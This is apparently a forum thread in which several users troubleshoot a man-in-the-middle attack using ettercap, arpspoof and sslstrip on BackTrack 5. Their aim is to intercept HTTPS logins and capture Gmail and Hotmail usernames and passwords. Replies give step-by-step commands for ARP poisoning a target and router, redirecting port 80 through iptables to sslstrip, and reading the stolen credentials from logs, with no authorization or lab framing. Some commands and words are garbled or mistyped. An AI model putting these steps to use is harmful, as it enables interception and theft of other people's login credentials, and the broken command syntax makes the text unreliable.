Ettercap and sslstrip in backtrack 5

[GaganGang]

I have a difficulty with Ettercap and Sslstrip. If I uncomment iptables on etter.conf, ettercap take over ssl, and the browser gives certificate errors. If I keep ignoring the errors, I ultimately get signed in. If I keep the iptables commented on etter.conf, sslstrip seem to get hold of over ssl connections and catches the login information. Nonetheless, the browser gets redirect back to sing up page. Basically, I can't log in. Seeing at the log, the whole thing is forwarded and spoofed appropriately. How can I overcome this problem?

[Zhankana_n]

If you wish to use ettercap as listener and sslstrip. You need to do following thing.
1. Forward physically with echo 1
2. Arpspoof equally ways with arpspoof -i ethx -t
3. Start ettercap as listener and grasp traffic in a file
ettercap -Tqi ethX -u -l my_ssl_data
4. Start iptables and run sslstrip -p -f
5. If you dash in this way ettercap, open an additional terminal and re-check the forwarding you did manually wit: cat /proc/sys.../ip_forward.And you will observe that is "1", because ettercap is in a row with -u, without forwarding.

[teena_pansare]

Hey guys I was facing the problem in setting up ethcercap and sslstrip I followed the above steps but u also have to check the sslstrip.log and you will observe a lot of information, but the user and password there gmail: Email=zyx@gmail.com&passwd=xxjjxx
hotmail: user=xxgg@hotmail.com&passwd=xx656x
The information in ettercap files with -l limitation, should be my_data_ssl.eci, release it with etterlog.You should install the etherlog (aptitude install etherlog)
expect this help you..I did work for me after two months of inspection videos and evaluating the various posts.

[windows_user]

After doing all settings I can see the captured user and password on ettercap. This is what I did.
sudo ettercap -Tqdi ethX -M arp:remote /target/ /router/
sudo iptables -t Nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
sudo sslstrip -a -k –f.When I open Gmail, I don't see the certificate error anymore even with iptables uncommented on etter.conf. Yea! I can't log in though. Of course I skipped "echo 1

[Dolsy_bendal]

It worked for you. As sslstrip is concerned, it should work. You can try this: iptables -t Nat --flush (flush the iptables, it flushes all appended chains to tables, in this case -A PREROUTING -p tcp --destination-port 80).Then re-type or re-enter the chain to the Table: iptables -t Nat - A REROUTING -to-port 10000sslstrip -p -f (I suggest to log only ssl posts which is the default)..Remember that the default port to listen for sslstrip is 10000, so no need to use the -l 10000.the log file will be left on the desktop if you are using Backtrack, if you are using Ubuntu it will be left in the /home/root/ directory, in both cases as sslstrip.log unless you use the -w option and give a path and name lo save the file. If you want to see the file "live" as it runs, open an additional terminal and type: tail -f my_ssldata.log this way you will see all http or https traffic as you navigate through, off course depending on the ssl parameters you use (-p, -a).I used both and the amount of info with -a is too much, unless you want to make a more deep study of traffic, use the -p option (default)..The -f is to show the little favicon showing that is a "secure page “then re-run ettercap. Try it.